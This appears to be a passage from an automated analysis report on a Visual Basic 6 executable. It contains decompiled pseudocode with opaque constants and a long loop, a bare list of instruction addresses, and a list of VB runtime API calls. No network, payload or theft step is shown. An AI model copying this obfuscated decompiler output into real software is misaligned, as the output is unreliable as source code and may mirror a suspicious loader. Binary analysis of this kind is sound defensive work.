					L004015AC();
					_v760 = _t1618;
				}
				_v444 = _v124;
				_v124 = _v124 & 0x00000000;
				_v164 = _v444;
				_v172 = 8;
				_v328 = 0x929e2990;
				_v324 = 0x5afb;
				_v308 =  *0x401148;
				_v448 = _v120;
				_v120 = _v120 & 0x00000000;
				L0040156A();
				_v292 = _v288;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v292,  &_v128,  &_v308,  &_v328,  &_v172, 0x3eabef);
				L00401588();
				_push( &_v140);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L004015A0();
				_t1856 = _t1855 + 0x10;
				L00401594();
				if( *0x41e010 != 0) {
					_v764 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v764 = 0x41e010;
				}
				_t1637 =  &_v132;
				L004015B8();
				_v348 = _t1637;
				_t1641 =  *((intOrPtr*)( *_v348 + 0x170))(_v348,  &_v120, _t1637,  *((intOrPtr*)( *((intOrPtr*)( *_v764)) + 0x300))( *_v764));
				asm("fclex");
				_v352 = _t1641;
				if(_v352 >= 0) {
					_v768 = _v768 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v768 = _t1641;
				}
				if( *0x41e010 != 0) {
					_v772 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v772 = 0x41e010;
				}
				_t1645 =  &_v136;
				L004015B8();
				_v356 = _t1645;
				_t1649 =  *((intOrPtr*)( *_v356 + 0x138))(_v356,  &_v308, _t1645,  *((intOrPtr*)( *((intOrPtr*)( *_v772)) + 0x308))( *_v772));
				asm("fclex");
				_v360 = _t1649;
				if(_v360 >= 0) {
					_v776 = _v776 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v776 = _t1649;
				}
				_v316 = _v308;
				_v344 =  *0x401160;
				_v228 = L"Laquearian";
				_v236 = 8;
				_v336 =  *0x401158;
				_v312 = 0x576d4;
				_v328 = 0xe211dc40;
				_v324 = 0x5b07;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1660 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v328,  &_v312,  &_v336, 0x10,  &_v344, _v120,  &_v316,  &_v288);
				_v364 = _t1660;
				if(_v364 >= 0) {
					_v780 = _v780 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x409ee0);
					_push(_a4);
					_push(_v364);
					L004015AC();
					_v780 = _t1660;
				}
				_v92 = _v288;
				L00401588();
				_push( &_v136);
				_push( &_v132);
				_push(2);
				L004015A0();
				_t1852 = _t1856 + 0xc;
				_v64 = _v64 + 1;
				if(_v64 >= 0x1afff) {
					goto L251;
				}
				goto L189;
				L251:
				_t1669 =  *((intOrPtr*)( *_a4 + 0x288))(_a4,  &_v132);
				asm("fclex");
				_v348 = _t1669;
				if(_v348 >= 0) {
					_v784 = _v784 & 0x00000000;
				} else {
					_push(0x288);
					_push(0x409eb0);
					_push(_a4);
					_push(_v348);
					L004015AC();
					_v784 = _t1669;
				}
				_push(0);
				_push(0);
				_push(_v132);
				_t1670 =  &_v172;
				_push(_t1670);
				L0040157C();
				_push(_t1670);
				L00401570();
				_v64 = _t1670;
				L004015A6();
				L00401594();
				_v64 = 0xaa41aaaa;
				L0040E0FB();
				 *_t1670 =  *_t1670 + _t1670;
				asm("wait");
				_push(0x41a516);
				L00401594();
				L00401594();
				L00401594();
				return _t1670;
			}

0x00417cd8
0x00417ce7
0x00417cf3
0x00417cfb
0x00417cfe
0x00417d0b
0x00417d14
0x00417d1f
0x00417d29
0x00417d46
0x00417d2b
0x00417d2b
0x00417d30
0x00417d35
0x00417d3a
0x00417d3a
0x00417d6a
0x00417d6e
0x00417d73
0x00417d79
0x00417d83
0x00417d90
0x00417d9d
0x00417d9e
0x00417d9f
0x00417da0
0x00417daf
0x00417db5
0x00417db7
0x00417dc4
0x00417de9
0x00417dc6
0x00417dc6
0x00417dcb
0x00417dd0
0x00417dd6
0x00417ddc
0x00417de1
0x00417de1
0x00417df3
0x00417dff
0x00417e1c
0x00417e01
0x00417e01
0x00417e06
0x00417e0b
0x00417e10
0x00417e10
0x00417e40
0x00417e44
0x00417e49
0x00417e64
0x00417e67
0x00417e69
0x00417e76
0x00417e98
0x00417e78
0x00417e78
0x00417e7a
0x00417e7f
0x00417e85
0x00417e8b
0x00417e90
0x00417e90
0x00417ea6
0x00417ec3
0x00417ea8
0x00417ea8
0x00417ead
0x00417eb2
0x00417eb7
0x00417eb7
0x00417ee7
0x00417eee
0x00417ef3
0x00417f0e
0x00417f14
0x00417f16
0x00417f23
0x00417f48
0x00417f25
0x00417f25
0x00417f2a
0x00417f2f
0x00417f35
0x00417f3b
0x00417f40
0x00417f40
0x00417f56
0x00417f73
0x00417f58
0x00417f58
0x00417f5d
0x00417f62
0x00417f67
0x00417f67
0x00417f8d
0x00417f97
0x00417f9e
0x00417fa3
0x00417fbb
0x00417fc1
0x00417fc3
0x00417fd0
0x00417ff5
0x00417fd2
0x00417fd2
0x00417fd7
0x00417fdc
0x00417fe2
0x00417fe8
0x00417fed
0x00417fed
0x00417fff
0x00418005
0x0041800f
0x00418015
0x00418025
0x0041802b
0x00418038
0x0041803e
0x0041804e
0x00418065
0x00418072
0x00418073
0x00418074
0x00418075
0x00418083
0x0041809f
0x004180a5
0x004180b2
0x004180d4
0x004180b4
0x004180b4
0x004180b9
0x004180be
0x004180c1
0x004180c7
0x004180cc
0x004180cc
0x004180e1
0x004180ea
0x004180f1
0x004180f5
0x004180f6
0x004180f8
0x00418106
0x0041810d
0x0041810e
0x00418110
0x00418115
0x0041811f
0x0041813c
0x00418121
0x00418121
0x00418126
0x0041812b
0x00418130
0x00418130
0x00418160
0x00418164
0x00418169
0x00418184
0x0041818a
0x0041818c
0x00418199
0x004181be
0x0041819b
0x0041819b
0x004181a0
0x004181a5
0x004181ab
0x004181b1
0x004181b6
0x004181b6
0x004181c5
0x004181cf
0x004181f5
0x004181fb
0x00418208
0x0041822a
0x0041820a
0x0041820a
0x0041820f
0x00418214
0x00418217
0x0041821d
0x00418222
0x00418222
0x00418237
0x0041823d
0x00418248
0x00418254
0x00418271
0x00418256
0x00418256
0x0041825b
0x00418260
0x00418265
0x00418265
0x00418295
0x00418299
0x0041829e
0x004182b9
0x004182bf
0x004182c1
0x004182ce
0x004182f3
0x004182d0
0x004182d0
0x004182d5
0x004182da
0x004182e0
0x004182e6
0x004182eb
0x004182eb
0x00418301
0x0041831e
0x00418303
0x00418303
0x00418308
0x0041830d
0x00418312
0x00418312
0x00418338
0x00418342
0x00418349
0x0041834e
0x00418369
0x0041836f
0x00418371
0x0041837e
0x004183a3
0x00418380
0x00418380
0x00418385
0x0041838a
0x00418390
0x00418396
0x0041839b
0x0041839b
0x004183b0
0x004183b6
0x004183d5
0x004183ea
0x004183f0
0x004183fd
0x0041841f
0x004183ff
0x004183ff
0x00418404
0x00418409
0x0041840c
0x00418412
0x00418417
0x00418417
0x0041842f
0x0041843a
0x0041843e
0x0041843f
0x00418441
0x00418446
0x0041844f
0x0041845b
0x00418478
0x0041845d
0x0041845d
0x00418462
0x00418467
0x0041846c
0x0041846c
0x00418492
0x0041849c
0x004184a0
0x004184a5
0x004184c0
0x004184c3
0x004184c5
0x004184d2
0x004184f4
0x004184d4
0x004184d4
0x004184d6
0x004184db
0x004184e1
0x004184e7
0x004184ec
0x004184ec
0x004184fb
0x00418505
0x00418515
0x0041851b
0x00418528
0x00418535
0x00418536
0x00418537
0x00418538
0x00418540
0x0041855b
0x0041856d
0x00418578
0x00418581
0x0041858d
0x004185aa
0x0041858f
0x0041858f
0x00418594
0x00418599
0x0041859e
0x0041859e
0x004185c4
0x004185ce
0x004185d2
0x004185d7
0x004185f2
0x004185f5
0x004185f7
0x00418604
0x00418626
0x00418606
0x00418606
0x00418608
0x0041860d
0x00418613
0x00418619
0x0041861e
0x0041861e
0x00418633
0x0041863f
0x00418645
0x0041864f
0x00418676
0x0041867c
0x00418689
0x0041868a
0x0041868b
0x0041868c
0x00418695
0x004186a1
0x004186a7
0x004186b4
0x004186c9
0x004186cf
0x004186dc
0x004186fe
0x004186de
0x004186de
0x004186e3
0x004186e8
0x004186eb
0x004186f1
0x004186f6
0x004186f6
0x0041870e
0x0041871a
0x00418737
0x0041871c
0x0041871c
0x00418721
0x00418726
0x0041872b
0x0041872b
0x0041875b
0x0041875f
0x00418764
0x0041877c
0x00418782
0x00418784
0x00418791
0x004187b6
0x00418793
0x00418793
0x00418798
0x0041879d
0x004187a3
0x004187a9
0x004187ae
0x004187ae
0x004187c4
0x004187e1
0x004187c6
0x004187c6
0x004187cb
0x004187d0
0x004187d5
0x004187d5
0x00418805
0x0041880c
0x00418811
0x0041882c
0x00418832
0x00418834
0x00418841
0x00418866
0x00418843
0x00418843
0x00418848
0x0041884d
0x00418853
0x00418859
0x0041885e
0x0041885e
0x00418873
0x0041887f
0x00418885
0x0041888f
0x0041889f
0x004188a5
0x004188af
0x004188b9
0x004188de
0x004188eb
0x004188ec
0x004188ed
0x004188ee
0x0041890c
0x00418912
0x0041891f
0x00418941
0x00418921
0x00418921
0x00418926
0x0041892b
0x0041892e
0x00418934
0x00418939
0x00418939
0x0041894f
0x00418956
0x00418968
0x0041896d
0x00418978
0x0041897e
0x0041898b
0x004189ad
0x0041898d
0x0041898d
0x00418992
0x00418997
0x0041899a
0x004189a0
0x004189a5
0x004189a5
0x004189c3
0x004189cf
0x004189d8
0x004189e2
0x004189ff
0x004189e4
0x004189e4
0x004189e9
0x004189ee
0x004189f3
0x004189f3
0x00418a23
0x00418a27
0x00418a2c
0x00418a47
0x00418a4d
0x00418a4f
0x00418a5c
0x00418a81
0x00418a5e
0x00418a5e
0x00418a63
0x00418a68
0x00418a6e
0x00418a74
0x00418a79
0x00418a79
0x00418a8f
0x00418aac
0x00418a91
0x00418a91
0x00418a96
0x00418a9b
0x00418aa0
0x00418aa0
0x00418ad0
0x00418ad7
0x00418adc
0x00418af7
0x00418afd
0x00418aff
0x00418b0c
0x00418b31
0x00418b0e
0x00418b0e
0x00418b13
0x00418b18
0x00418b1e
0x00418b24
0x00418b29
0x00418b29
0x00418b3f
0x00418b5c
0x00418b41
0x00418b41
0x00418b46
0x00418b4b
0x00418b50
0x00418b50
0x00418b80
0x00418b87
0x00418b8c
0x00418ba7
0x00418bad
0x00418baf
0x00418bbc
0x00418be1
0x00418bbe
0x00418bbe
0x00418bc3
0x00418bc8
0x00418bce
0x00418bd4
0x00418bd9
0x00418bd9
0x00418bef
0x00418c0c
0x00418bf1
0x00418bf1
0x00418bf6
0x00418bfb
0x00418c00
0x00418c00
0x00418c30
0x00418c37
0x00418c3c
0x00418c57
0x00418c5d
0x00418c5f
0x00418c6c
0x00418c91
0x00418c6e
0x00418c6e
0x00418c73
0x00418c78
0x00418c7e
0x00418c84
0x00418c89
0x00418c89
0x00418c9f
0x00418cbc
0x00418ca1
0x00418ca1
0x00418ca6
0x00418cab
0x00418cb0
0x00418cb0
0x00418ce0
0x00418ce7
0x00418cec
0x00418d07
0x00418d0d
0x00418d0f
0x00418d1c
0x00418d41
0x00418d1e
0x00418d1e
0x00418d23
0x00418d28
0x00418d2e
0x00418d34
0x00418d39
0x00418d39
0x00418d4f
0x00418d6c
0x00418d51
0x00418d51
0x00418d56
0x00418d5b
0x00418d60
0x00418d60
0x00418d86
0x00418d90
0x00418d97
0x00418d9c
0x00418db7
0x00418dbd
0x00418dbf
0x00418dcc
0x00418df1
0x00418dce
0x00418dce
0x00418dd3
0x00418dd8
0x00418dde
0x00418de4
0x00418de9
0x00418de9
0x00418df8
0x00418e02
0x00418e12
0x00418e18
0x00418e25
0x00418e2b
0x00418e3c
0x00418e43
0x00418e54
0x00418e76
0x00418e7c
0x00418e89
0x00418e8a
0x00418e8b
0x00418e8c
0x00418ea3
0x00418ec0
0x00418ec6
0x00418ed3
0x00418ef5
0x00418ed5
0x00418ed5
0x00418eda
0x00418edf
0x00418ee2
0x00418ee8
0x00418eed
0x00418eed
0x00418f05
0x00418f10
0x00418f17
0x00418f1e
0x00418f25
0x00418f2c
0x00418f30
0x00418f31
0x00418f33
0x00418f41
0x00418f48
0x00418f49
0x00418f4b
0x00418f50
0x00418f5a
0x00418f77
0x00418f5c
0x00418f5c
0x00418f61
0x00418f66
0x00418f6b
0x00418f6b
0x00418f9b
0x00418f9f
0x00418fa4
0x00418fbf
0x00418fc2
0x00418fc4
0x00418fd1
0x00418ff3
0x00418fd3
0x00418fd3
0x00418fd5
0x00418fda
0x00418fe0
0x00418fe6
0x00418feb
0x00418feb
0x00419001
0x0041901e
0x00419003
0x00419003
0x00419008
0x0041900d
0x00419012
0x00419012
0x00419042
0x00419049
0x0041904e
0x00419066
0x0041906c
0x0041906e
0x0041907b
0x004190a0
0x0041907d
0x0041907d
0x00419082
0x00419087
0x0041908d
0x00419093
0x00419098
0x00419098
0x004190aa
0x004190b0
0x004190ba
0x004190c0
0x004190d2
0x004190e5
0x004190f9
0x00419102
0x0041910d
0x00419111
0x00419112
0x00419114
0x00419119
0x00419122
0x0041912e
0x0041914b
0x00419130
0x00419130
0x00419135
0x0041913a
0x0041913f
0x0041913f
0x0041916f
0x00419173
0x00419178
0x00419193
0x00419199
0x0041919b
0x004191a8
0x004191cd
0x004191aa
0x004191aa
0x004191af
0x004191b4
0x004191ba
0x004191c0
0x004191c5
0x004191c5
0x004191d4
0x004191d6
0x004191d8
0x004191e4
0x004191e5
0x004191ea
0x004191f4
0x00419211
0x004191f6
0x004191f6
0x004191fb
0x00419200
0x00419205
0x00419205
0x00419235
0x0041923c
0x00419241
0x0041925c
0x00419262
0x00419264
0x00419271
0x00419296
0x00419273
0x00419273
0x00419278
0x0041927d
0x00419283
0x00419289
0x0041928e
0x0041928e
0x004192a3
0x004192a9
0x004192b6
0x004192bc
0x004192cc
0x004192d2
0x004192dc
0x004192e6
0x004192f0
0x004192fa
0x00419304
0x0041931a
0x0041931f
0x00419326
0x0041932b
0x00419331
0x0041933b
0x00419345
0x0041934f
0x00419371
0x0041937e
0x0041937f
0x00419380
0x00419381
0x00419385
0x00419392
0x00419393
0x00419394
0x00419395
0x004193c4
0x004193ca
0x004193d7
0x004193f9
0x004193d9
0x004193d9
0x004193de
0x004193e3
0x004193e6
0x004193ec
0x004193f1
0x004193f1
0x00419406
0x0041940f
0x00419416
0x0041941a
0x0041941b
0x0041941d
0x0041942b
0x00419432
0x00419439
0x00419440
0x00419441
0x00419443
0x00419448
0x00419452
0x0041946f
0x00419454
0x00419454
0x00419459
0x0041945e
0x00419463
0x00419463
0x00419493
0x00419497
0x0041949c
0x004194b7
0x004194bd
0x004194bf
0x004194cc
0x004194f1
0x004194ce
0x004194ce
0x004194d3
0x004194d8
0x004194de
0x004194e4
0x004194e9
0x004194e9
0x004194ff
0x0041951c
0x00419501
0x00419501
0x00419506
0x0041950b
0x00419510
0x00419510
0x00419540
0x00419547
0x0041954c
0x00419564
0x00419567
0x00419569
0x00419576
0x00419598
0x00419578
0x00419578
0x0041957a
0x0041957f
0x00419585
0x0041958b
0x00419590
0x00419590
0x004195a6
0x004195c3
0x004195a8
0x004195a8
0x004195ad
0x004195b2
0x004195b7
0x004195b7
0x004195e7
0x004195ee
0x004195f3
0x0041960b
0x00419611
0x00419613
0x00419620
0x00419645
0x00419622
0x00419622
0x00419627
0x0041962c
0x00419632
0x00419638
0x0041963d
0x0041963d
0x0041964f
0x00419655
0x0041965f
0x00419665
0x0041966f
0x00419679
0x00419689
0x00419692
0x00419698
0x004196a5
0x004196b1
0x004196e5
0x004196ee
0x004196f9
0x00419700
0x00419704
0x00419705
0x00419707
0x0041970c
0x00419715
0x00419721
0x0041973e
0x00419723
0x00419723
0x00419728
0x0041972d
0x00419732
0x00419732
0x00419762
0x00419766
0x0041976b
0x00419786
0x0041978c
0x0041978e
0x0041979b
0x004197c0
0x0041979d
0x0041979d
0x004197a2
0x004197a7
0x004197ad
0x004197b3
0x004197b8
0x004197b8
0x004197c7
0x004197c9
0x004197cb
0x004197d7
0x004197d8
0x004197dd
0x004197e7
0x00419804
0x004197e9
0x004197e9
0x004197ee
0x004197f3
0x004197f8
0x004197f8
0x00419828
0x0041982f
0x00419834
0x0041984f
0x00419855
0x00419857
0x00419864
0x00419889
0x00419866
0x00419866
0x0041986b
0x00419870
0x00419876
0x0041987c
0x00419881
0x00419881
0x00419897
0x004198b4
0x00419899
0x00419899
0x0041989e
0x004198a3
0x004198a8
0x004198a8
0x004198ce
0x004198d8
0x004198df
0x004198e4
0x004198fc
0x004198ff
0x00419901
0x0041990e
0x00419930
0x00419910
0x00419910
0x00419912
0x00419917
0x0041991d
0x00419923
0x00419928
0x00419928
0x0041993d
0x00419943
0x00419950
0x00419956
0x00419960
0x00419966
0x00419976
0x004199c6
0x004199c9
0x004199d0
0x004199de
0x004199eb
0x00419a0a
0x00419a22
0x00419a27
0x00419a32
0x00419a38
0x00419a3a
0x00419a47
0x00419a69
0x00419a49
0x00419a49
0x00419a4e
0x00419a53
0x00419a56
0x00419a5c
0x00419a61
0x00419a61
0x00000000
0x00419a70
0x00419a77
0x00419a94
0x00419a79
0x00419a79
0x00419a7e
0x00419a83
0x00419a88
0x00419a88
0x00419ab8
0x00419abc
0x00419ac1
0x00419adc
0x00419ae2
0x00419ae4
0x00419af1
0x00419b16
0x00419af3
0x00419af3
0x00419af8
0x00419afd
0x00419b03
0x00419b09
0x00419b0e
0x00419b0e
0x00419b1d
0x00419b1f
0x00419b21
0x00419b2d
0x00419b2e
0x00419b33
0x00419b3d
0x00419b5a
0x00419b3f
0x00419b3f
0x00419b44
0x00419b49
0x00419b4e
0x00419b4e
0x00419b7e
0x00419b85
0x00419b8a
0x00419ba5
0x00419bab
0x00419bad
0x00419bba
0x00419bdf
0x00419bbc
0x00419bbc
0x00419bc1
0x00419bc6
0x00419bcc
0x00419bd2
0x00419bd7
0x00419bd7
0x00419bed
0x00419c0a
0x00419bef
0x00419bef
0x00419bf4
0x00419bf9
0x00419bfe
0x00419bfe
0x00419c24
0x00419c2e
0x00419c35
0x00419c3a
0x00419c52
0x00419c55
0x00419c57
0x00419c64
0x00419c86
0x00419c66
0x00419c66
0x00419c68
0x00419c6d
0x00419c73
0x00419c79
0x00419c7e
0x00419c7e
0x00419c93
0x00419c99
0x00419ca6
0x00419cac
0x00419cb6
0x00419cbc
0x00419ccc
0x00419d1c
0x00419d1f
0x00419d26
0x00419d34
0x00419d41
0x00419d4b
0x00419d52
0x00419d59
0x00419d5d
0x00419d5e
0x00419d60
0x00419d6e
0x00419d75
0x00419d76
0x00419d78
0x00419d7d
0x00419d87
0x00419da4
0x00419d89
0x00419d89
0x00419d8e
0x00419d93
0x00419d98
0x00419d98
0x00419dc8
0x00419dcc
0x00419dd1
0x00419dec
0x00419df2
0x00419df4
0x00419e01
0x00419e26
0x00419e03
0x00419e03
0x00419e08
0x00419e0d
0x00419e13
0x00419e19
0x00419e1e
0x00419e1e
0x00419e2d
0x00419e37
0x00419e5d
0x00419e63
0x00419e70
0x00419e92
0x00419e72
0x00419e72
0x00419e77
0x00419e7c
0x00419e7f
0x00419e85
0x00419e8a
0x00419e8a
0x00419e9f
0x00419ea5
0x00419eb0
0x00419ebc
0x00419ed9
0x00419ebe
0x00419ebe
0x00419ec3
0x00419ec8
0x00419ecd
0x00419ecd
0x00419efd
0x00419f01
0x00419f06
0x00419f21
0x00419f27
0x00419f29
0x00419f36
0x00419f5b
0x00419f38
0x00419f38
0x00419f3d
0x00419f42
0x00419f48
0x00419f4e
0x00419f53
0x00419f53
0x00419f69
0x00419f86
0x00419f6b
0x00419f6b
0x00419f70
0x00419f75
0x00419f7a
0x00419f7a
0x00419faa
0x00419fb1
0x00419fb6
0x00419fce
0x00419fd1
0x00419fd3
0x00419fe0
0x0041a002
0x00419fe2
0x00419fe2
0x00419fe4
0x00419fe9
0x00419fef
0x00419ff5
0x00419ffa
0x00419ffa
0x0041a010
0x0041a02d
0x0041a012
0x0041a012
0x0041a017
0x0041a01c
0x0041a021
0x0041a021
0x0041a051
0x0041a058
0x0041a05d
0x0041a075
0x0041a07b
0x0041a07d
0x0041a08a
0x0041a0af
0x0041a08c
0x0041a08c
0x0041a091
0x0041a096
0x0041a09c
0x0041a0a2
0x0041a0a7
0x0041a0a7
0x0041a0b9
0x0041a0bf
0x0041a0c9
0x0041a0cf
0x0041a0d9
0x0041a0e3
0x0041a0f3
0x0041a0fc
0x0041a102
0x0041a10f
0x0041a11b
0x0041a14f
0x0041a158
0x0041a163
0x0041a16a
0x0041a16e
0x0041a16f
0x0041a171
0x0041a176
0x0041a17f
0x0041a18b
0x0041a1a8
0x0041a18d
0x0041a18d
0x0041a192
0x0041a197
0x0041a19c
0x0041a19c
0x0041a1cc
0x0041a1d0
0x0041a1d5
0x0041a1ed
0x0041a1f3
0x0041a1f5
0x0041a202
0x0041a227
0x0041a204
0x0041a204
0x0041a209
0x0041a20e
0x0041a214
0x0041a21a
0x0041a21f
0x0041a21f
0x0041a235
0x0041a252
0x0041a237
0x0041a237
0x0041a23c
0x0041a241
0x0041a246
0x0041a246
0x0041a276
0x0041a27d
0x0041a282
0x0041a29d
0x0041a2a3
0x0041a2a5
0x0041a2b2
0x0041a2d7
0x0041a2b4
0x0041a2b4
0x0041a2b9
0x0041a2be
0x0041a2c4
0x0041a2ca
0x0041a2cf
0x0041a2cf
0x0041a2e4
0x0041a2f0
0x0041a2f6
0x0041a300
0x0041a310
0x0041a316
0x0041a320
0x0041a32a
0x0041a34f
0x0041a35c
0x0041a35d
0x0041a35e
0x0041a35f
0x0041a37d
0x0041a383
0x0041a390
0x0041a3b2
0x0041a392
0x0041a392
0x0041a397
0x0041a39c
0x0041a39f
0x0041a3a5
0x0041a3aa
0x0041a3aa
0x0041a3c0
0x0041a3c7
0x0041a3d2
0x0041a3d6
0x0041a3d7
0x0041a3d9
0x0041a3de
0x0041a3e5
0x0041a3ef
0x00000000
0x00000000
0x00000000
0x0041a3f6
0x0041a402
0x0041a408
0x0041a40a
0x0041a417
0x0041a439
0x0041a419
0x0041a419
0x0041a41e
0x0041a423
0x0041a426
0x0041a42c
0x0041a431
0x0041a431
0x0041a440
0x0041a442
0x0041a444
0x0041a447
0x0041a44d
0x0041a44e
0x0041a456
0x0041a457
0x0041a45c
0x0041a462
0x0041a46d
0x0041a472
0x0041a479
0x0041a47e
0x0041a480
0x0041a481
0x0041a500
0x0041a508
0x0041a510
0x0041a515

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00417CF3
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 00417D35
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417D6E
__vbaChkstk.MSVBVM60(?,00000000), ref: 00417D90
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,000001C8), ref: 00417DDC
__vbaFreeObj.MSVBVM60(00000000,?,0040A0F4,000001C8), ref: 00417DF3
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00417E0B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417E44
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000070), ref: 00417E8B
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00417EB2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417EEE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000130), ref: 00417F3B
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00417F62
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417F9E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000158), ref: 00417FE8
__vbaChkstk.MSVBVM60(00000008,?), ref: 00418065
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,000006F8,?,?,007C6360,00000008,?), ref: 004180C7
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,007C6360,00000008,?), ref: 004180F8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00401426), ref: 00418110
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,?,?,00401426), ref: 0041812B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418164
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000118), ref: 004181B1
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,000006FC), ref: 0041821D
__vbaFreeObj.MSVBVM60(00000000,00401198,00409EE0,000006FC), ref: 0041823D
__vbaFreeVar.MSVBVM60(00000000,00401198,00409EE0,000006FC), ref: 00418248
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418260
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418299
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000088), ref: 004182E6
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041830D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418349
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A0F4,000001A0), ref: 00418396
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,00000700,?,00000003,?), ref: 00418412
__vbaVarMove.MSVBVM60(?,00000003,?), ref: 0041842F
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000003,?), ref: 00418441
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00401426), ref: 0041844F
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,?,?,?,?,?,00401426), ref: 00418467
__vbaObjSet.MSVBVM60(?,00000000), ref: 004184A0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000070), ref: 004184E7
__vbaChkstk.MSVBVM60(00000000,?,0040A0F4,00000070), ref: 00418528
__vbaFreeObj.MSVBVM60(?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418581
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418599
__vbaObjSet.MSVBVM60(?,00000000,?,?,005507C2,?,?,33E444A0,00005B02), ref: 004185D2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000078,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418619
__vbaChkstk.MSVBVM60(?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 0041867C
__vbaFreeObj.MSVBVM60(?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 004186A7
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,00000704,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 004186F1
__vbaVarMove.MSVBVM60(?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 0041870E
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418726
__vbaObjSet.MSVBVM60(?,00000000,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 0041875F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A0F4,00000170,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 004187A9
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 004187D0
__vbaObjSet.MSVBVM60(?,00000000,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 0041880C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000138,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418859
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 004188DE
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,00000708,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418934
__vbaFreeStr.MSVBVM60(?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418956
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,005507C2,?,?,?,?,005507C2,?,?,33E444A0,00005B02), ref: 00418968
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,0000070C), ref: 004189A0
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 004189EE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418A27
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A120,000000A0), ref: 00418A74
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418A9B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418AD7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000000A0), ref: 00418B24
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418B4B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418B87
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000000F0), ref: 00418BD4
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418BFB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418C37
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000178), ref: 00418C84
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418CAB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418CE7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000080), ref: 00418D34
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418D5B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418D97
